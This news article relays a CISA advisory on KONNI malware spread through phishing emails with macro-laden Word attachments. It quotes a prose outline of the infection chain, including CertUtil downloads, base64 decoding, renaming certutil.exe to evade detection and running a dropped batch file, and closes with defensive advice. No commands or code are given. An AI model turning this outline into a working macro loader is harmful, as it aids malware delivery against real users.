The Cybersecurity and Infrastructure Security Agency (CISA) advised users to be wary of an email attachment containing a malicious Microsoft Word document that’s used to deploy KONNI malware.
Phishing is one of the main methods hackers use to spread malware, and there’s a solid reason for that. It doesn’t require technical expertise to infiltrate networks or to compromise security systems. Careless or untrained employees will do the work of hackers when they open an email without double-checking where it comes from.
Phishing emails usually try to trick users into visiting a website that looks very much like the official one, so they can steal their credentials. In some cases, the simple act of visiting a website can compromise a device or PC, if it’s vulnerable. Phishing emails also carry infected attachments, and Word documents are among the most common.
Microsoft Word features Macro automatization functions that have legitimate uses, but bad actors can use them to run commands and install further payloads, all invisible to the users.
“Once the Visual Basic Application (VBA) macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator” says CISA in the advisory. “It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.”
“The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.”
The result is the final installation of KONNI, a remote administration tool that hackers use to steal files, infect other hosts in the same network, take screenshots, capture keystrokes and more.
The best way to protect against this type of attack is to have a security solution installed and up to date, to never open attachments from unknown sources and to keep the Macro function disabled by default.